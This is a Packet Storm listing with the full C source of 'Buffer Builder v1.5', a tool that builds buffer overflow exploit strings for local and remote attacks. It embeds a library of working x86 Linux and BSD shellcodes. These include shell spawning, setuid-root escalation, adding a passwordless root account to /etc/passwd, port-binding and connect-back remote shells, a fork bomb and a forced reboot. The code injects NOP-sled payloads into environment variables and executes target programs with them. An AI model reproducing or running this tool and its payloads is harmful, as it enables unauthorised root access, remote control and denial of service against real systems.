Buffer Builder v1.5 is a tool which assists in building buffer overflow strings for local and remote exploits. Goes well with a disassembler and netcat and contains several useful shell codes.
39c3af509337569eee964333a3439de850f8fc3714f170e17d504bf6ee4104ed
/*
* Buffer Builder (gml@phrick.net)
* EggShell Builder for *nix
* http://www.phrick.net/~gml
* gcc -o bb bb.c
*
*/
#define SHELL "/bin/sh"
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#define BANNER "\n.:Buffer Builder v1.5:.\t{gml@phrick.net}"
#define R "\033[1;35m"
#define G "\033[1;34m"
#define B "\033[1;30m"
#define Y "\033[1;36m"
#define RESET "\33[0;0m"
#define NOP 0x90
// global var
char *me;
// Platforms
struct {
char *plat; // platform
int endian; // endianness
} plats[] = {
{"intel", 1},
{"sun4u", 0},
{"mips", 0},
}, pchoose;
// Shellcodes
struct {
char *name; // name key
char *desc; // description
char *auth; // author
char *shell; // shellcode
char *plat; // platform
long base; // address base
} shells[] = {
// name = os.plat.type.author
{ "linux", "linux base","no one", "", "", 0xbffffffa },
{ "bsd", "bsd base","no one", "", "", 0xbfbffffa},
{ "linux.intel.sh.aleph", "execve() execution of /bin/sh", "aleph1","\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh", "intel", 0xbffffffa},
{ "linux.intel.sh.bob", "28 byte version of /bin/sh", "bob@dtors.net",
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80", "intel", 0xbffffffa},
{ "linux.intel.ash.bob", "31 byte version of execve() /bin/ash then exit()", "bob@dtors.net",
"\x31\xc0\x50\x68\x2f\x61\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80", "intel",
0xbffffffa},
{ "linux.intel.setuid.bob", "Setuid(0,0) shellcode", "bob@dtors.net",
"\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80", "intel", 0xbffffffa},
{ "linux.intel.rootsh.bob", "makes /bin/sh suid", "bob@dtors.net",
"\x31\xc0\x31\xdb\x31\xc9\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x66\xb9\xfd\x09\xb0\x0f\xcd\x80\xb0\x01\xcd\x80", "intel", 0xbffffffa},
{ "linux.intel.passwd.bob", "Adds root account with no passwd to /etc/passwd", "bob@dtors.net", "\x31\xc0\x31\xdb\x31\xc9\x53\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x89\xe3\x66\xb9\x01\x04\xb0\x05\xcd\x80\x89\xc3\x31\xc0\x31\xd2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x68\x3a\x3a\x2f\x3a\x68\x3a\x30\x3a\x30\x68\x62\x6f\x62\x3a\x89\xe1\xb2\x14\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80\x31\xc0\xb0\x01\xcd\x80", "intel", 0xbffffffa},
{ "linux.intel.port.esdee", "linux portbinding shellcode port 45295", "eSDee@netric.org",
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0\x89\xf3\xb0\x06\xcd\x80\xeb\x99", "intel", 0xbffffffa},
{ "bsd.intel.port.esdee", "bsdportbinding shellcode port 45295", "eSDee@netric.org",
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80\xeb\x9a", "intel", 0xbfbffffa},
{ "linux.intel.evade.tolower", "tolower evasion and execve() execution of /bin/sh", "unknown",
"\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh", "intel", 0xbffffffa},
{ "linux.intel.evade.toupper", "toupper evasion and execve() execution of /bin/sh", "unknown",
"\xeb\x29\x5e\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20\x43\xe0\xfa\x29\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8\xd2\xff\xff\xff\x0f\x42\x49\x4e\x0f\x53\x48", "intel", 0xbffffffa},
{ "linux.intel.sh.zillion", "linux shellcode", "zillion",
"\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68", "intel", 0xbffffffa},
{ "bsd.intel.sh.zillion", "bsd shellcode", "zillion",
"\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68","intel", 0xbfbffffa},
{ "linux.intel.reboot.zillion", "clean reboot shellcode", "zillion",
"\xeb\x27\x5e\x31\xc0\xb0\x24\xcd\x80\xb0\x24\xcd\x80\x5e\x31\xc0\xb0\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28\xba\x67\x45\x23\x01\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xd4\xff\xff\xff", "intel", 0xbffffffa},
{ "bsd.intel.sh.esdee", "bsd shellcode", "eSDee@netric.org",
"\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80", "intel", 0xbfbffffa},
{ "linux.intel.connect.esdee", "linux Connect Back Shellcode port 45295", "eSDee@netric.org",
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80", "intel", 0xbffffffa},
{ "bsd.intel.connect.esdee", "bsdConnect Back Shellcode port 45295", "eSDee@netric.org",
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80\xeb\x9a", "intel", 0xbfbffffa},
{ "linux.intel.fb.gml", "fork() bomb shellcode in 6 bytes", "gml@phrick.net",
"\xb0\x02\xcd\x80\xeb\xfa", "intel", 0xbffffffa},
{ "linux.intel.write.gml", "write() shellcode 'gml'", "gml@phrick.net",
"\x31\xdb\x31\xc0\x31\xd2\xb2\x08\x68\x67\x6d\x6c\x0a\x89\xe1\xb0\x04\xcd\x80\xb0\x01\xcd\x80", "intel", 0xbffffffa},
{ "linux.intel.tty.sorbo", "full tty support port shell port 6666\n\t\t\thttp://www.darkircop.org/security/exploits/sorshell.c for client code\n\t\t\t", "sorbox@yahoo.com",
"\x31\xc0\xb0\x06\x50\xb0\x01\x50\x89\xc3\x40\x50\xb0\x66\x89\xe1\xcd\x80\x89\xc2\xb0\x01\x89\xe1\xb0\x04\x50\x51\xb0\x02\x50\x48\x50\x52\x89\xe1\xb0\x66\xb3\x0e\xcd\x80\x31\xdb\x53\x66\xb9\x1a\x0a\xc1\xe1\x10\xb1\x02\x51\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x52\x89\xe1\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x52\x89\xe1\xb0\x66\x43\xcd\x80\x89\xc7\x31\xd2\x52\x68\x70\x74\x6d\x78\x68\x64\x65\x76\x2f\x68\x2f\x2f\x2f\x2f\x31\xc9\xb1\x02\x89\xe3\xb0\x05\xcd\x80\x89\xc6\x52\x89\xe2\xb9\x31\x54\x04\x40\x89\xf3\xb0\x36\xcd\x80\x89\xe2\xb9\x30\x54\x04\x80\xb0\x36\xcd\x80\x59\x83\xc1\x30\xc1\xe1\x18\xba\x01\x74\x73\x2f\xc1\xea\x08\x01\xca\x31\xc9\x51\x52\x31\xd2\x68\x65\x76\x2f\x70\x68\x2f\x2f\x2f\x64\xb1\x02\x89\xe3\xb0\x05\xcd\x80\x89\xc2\xb0\x02\xcd\x80\x31\xc9\x39\xc8\x75\x40\xb0\x42\xcd\x80\xb1\x03\x31\xc0\x89\xd3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x89\xd3\xb0\x06\xcd\x80\x89\xf3\xb0\x06\xcd\x80\x89\xfb\xb0\x06\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x89\xd3\x31\xc0\xb0\x06\xcd\x80\x83\xec\x50\x31\xc0\x31\xdb\x31\xc9\x89\xf9\x43\xd3\xe3\x09\xd8\x89\xf1\x31\xdb\x43\xd3\xe3\x09\xd8\x50\x89\xda\x89\xcb\x43\x89\xe1\x52\x57\x56\x31\xff\x31\xf6\x31\xd2\xb0\x8e\xcd\x80\x5e\x5f\x5b\x58\x21\xd8\x31\xdb\x39\xc3\x75\x1b\xb2\x50\x89\xe1\x89\xfb\x31\xc0\xb0\x03\xcd\x80\x83\xf8\x01\x7c\x25\x89\xc2\x89\xf3\xb0\x04\xcd\x80\xeb\xae\xb2\x50\x89\xe1\x89\xf3\x31\xc0\xb0\x03\xcd\x80\x83\xf8\x01\x7c\x0a\x89\xc2\x89\xfb\xb0\x04\xcd\x80\xeb\x93\x31\xc0\x40\xcd\x80", "intel", 0xbffffffa},
},choose;
int reverse(char *buffer, unsigned long ret)
{
if(sizeof(buffer) >= 4)
{
buffer[0] = (ret & 0x000000ff);
buffer[1] = (ret & 0x0000ff00) >> 8;
buffer[2] = (ret & 0x00ff0000) >> 16;
buffer[3] = (ret & 0xff000000) >> 24;
buffer[4] = 0x0;
return (0);
}
else
{
return (1);
}
}
int forward(char *buffer, unsigned long ret)
{
if(sizeof(buffer) >= 4)
{
buffer[3] = (ret & 0x000000ff);
buffer[2] = (ret & 0x0000ff00) >> 8;
buffer[1] = (ret & 0x00ff0000) >> 16;
buffer[0] = (ret & 0xff000000) >> 24;
buffer[4] = 0x0;
return (0);
}
else
{
return (1);
}
}
void usage()
{
int i = 0;
fprintf(stderr, "%s", R);
fprintf(stderr, "%s\n", BANNER);
fprintf(stderr, "%s", Y);
fprintf(stderr, "usage: %s [-e <path> | -s, stdout] -n <size> -c <shellcode> -p <platform> -a [<address>|0x0] -r <repeat address> -o <offset> -v <env variable>\n\n", me);
fprintf(stderr, ".:options:.\n");
fprintf(stderr, "-e\t:execute program\n");
fprintf(stderr, "-s\t:execute shell\n");
fprintf(stderr, "-n\t:nop size\n");
fprintf(stderr, "-c\t:shellcode\n");
fprintf(stderr, "-p\t:platform\n");
fprintf(stderr, "-a\t:address, 0x0 = default for shellcode\n");
fprintf(stderr, "-r\t:repeat address #times\n");
fprintf(stderr, "-o\t:address offset\n");
fprintf(stderr, "-v\t:name of environment variable to use ($SHELLCODE is default)\n");
fprintf(stderr, "\n");
fprintf(stderr, "%s", B);
fprintf(stderr, ".:Available Platforms:.\n");
fprintf(stderr, "%s", G);
for(i = 0; i < sizeof(plats)/sizeof(pchoose); i++)
fprintf(stderr, "%s ", plats[i].plat);
fprintf(stderr, "\n\n");
fprintf(stderr, "%s", B);
fprintf(stderr, ".:Available Shellcode:. \n");
for(i = 0; i < sizeof(shells)/sizeof(choose); i++)
fprintf(stderr, "%s[%s]\n\t%s{%d bytes}\t{%s by %s}\n",G,shells[i].name, B, strlen(shells[i].shell) ,shells[i].desc, shells[i].auth);
fprintf(stderr, "%s\n", RESET);
exit(0);
}
int chooseshell(char *id)
{
int i = 0;
for(i = 0; i < sizeof(shells)/sizeof(choose); i++)
{
if(!strcmp(shells[i].name , id))
{
return i;
}
}
return -1;
}
int chooseplatform(char *plat)
{
int i = 0;
for(i = 0; i < sizeof(plats)/sizeof(pchoose); i++)
{
if(!strcmp(plats[i].plat, plat))
{
return plats[i].endian;
}
}
return -1;
}
int main(int argc, char **argv)
{
char *shell, *envvar;
char addrbuff[20000];
char addbuff[5];
char *envbuff;
char *env[2];
char *exec;
int shellme = 0;
int execme = 0;
int shellref = 0;
int opt;
long ret, address, base, *addr_ptr;
long offset = 0;
char *ptr;
int nopsize = 0;
int endian = 1;
int times = 1;
int count = 0;
char *buffer;
int bufsize = 0;
me = argv[0];
// setup option variables
envvar = "SHELLCODE";
if((int)argc <= 1)
usage();
// parse command line arguments
while((opt = getopt(argc, argv, "e:sn:c:p:a:r:o:hv:")) != -1)
{
switch(opt)
{
case 'e':
execme = 1;
exec = optarg;
break;
case 's':
shellme = 1;
break;
case 'n':
nopsize = atoi(optarg);
break;
case 'c':
if((shellref = chooseshell(optarg)) == -1)
{
fprintf(stderr, "Invalid Shellcode Selected!!!\n");
exit(0);
}
base = shells[shellref].base;
break;
case 'p':
if(!strcmp(shells[shellref].plat, ""))
{
if((endian = chooseplatform(optarg)) == -1)
{
fprintf(stderr, "Invalid Platform Selected!!!\n");
exit(0);
}
}
else
{
endian = chooseplatform(shells[shellref].plat);
}
break;
case 'a':
if(!strcmp(optarg, "0x0"))
{
address = base;
}
else
{
address = strtoul(optarg, 0, 0);
}
break;
case 'r':
times = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
address = address + offset;
break;
case 'v':
envvar = optarg;
break;
case 'h':
usage();
break;
case '?':
if (isprint (optopt))
fprintf (stderr, "Unknown option `-%c'. -h for help.\n", optopt);
else
fprintf (stderr, "Unknown option character `\\x%x'. -h for help.\n", optopt);
return 1;
default:
usage();
}
}
// choose shell
shell = shells[shellref].shell;
// add necessary nop sled for env portion
if(shellme || execme)
nopsize = 5000;
// calculate buffer size
bufsize = nopsize + strlen(shell);
// add to buffer size
for(count = 1; count <= times; count++)
{
bufsize += 4;
}
if(bufsize > 1)
{
bufsize++;
}
else
{
fprintf(stderr, "You're buffer is too small!!!\n");
exit(0);
}
// create buffer on the heap
buffer = (char *)malloc(bufsize);
// Fill the buffer with NOP
memset(buffer, NOP, bufsize);
// Fill buffer with shellcode
memcpy(&buffer[nopsize], shell, strlen(shell));
// Fill buffer with address
if(!execme && !shellme)
{
if(endian)
{
// little-endian
reverse(addbuff, address);
for(count = 0; count < times; count++)
{
memcpy(&buffer[nopsize + strlen(shell) + (count *4)], addbuff, strlen(addbuff));
}
}
else
{
// big-endian
forward(addbuff, address);
for(count = 0; count < times; count++)
{
memcpy(&buffer[nopsize + strlen(shell) + (count *4)], addbuff, strlen(addbuff));
}
}
}
// End the buffer
buffer[bufsize - 1] = 0;
fprintf(stderr, "%s", Y);
if(shellme || execme)
{
envbuff = (char *)malloc(strlen(buffer) + strlen(envvar));
sprintf(envbuff, "%s=%s", envvar, buffer);
env[0] = envbuff;
env[1] = 0;
if(shellme)
{
ret = base - strlen(envbuff) - strlen(SHELL);
fprintf(stderr, "Shellcode was loaded into: %s @ %p\n", envvar, ret);
execle(SHELL, SHELL, 0, env);
}
else
{
ret = base - strlen(envbuff) - strlen(exec);
ptr = addrbuff;
addr_ptr = (long *) ptr;
for(count = 0; count < sizeof(addrbuff); count+=4)
{ *(addr_ptr++) = ret; }
addrbuff[strlen(addrbuff) -1] = 0;
execle(exec, exec,addrbuff, 0, env);
}
free(envbuff);
}
else
{
fprintf(stderr, "Shellcode to stdout...\n");
fprintf(stdout, buffer);
}
free(buffer);
exit(0);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed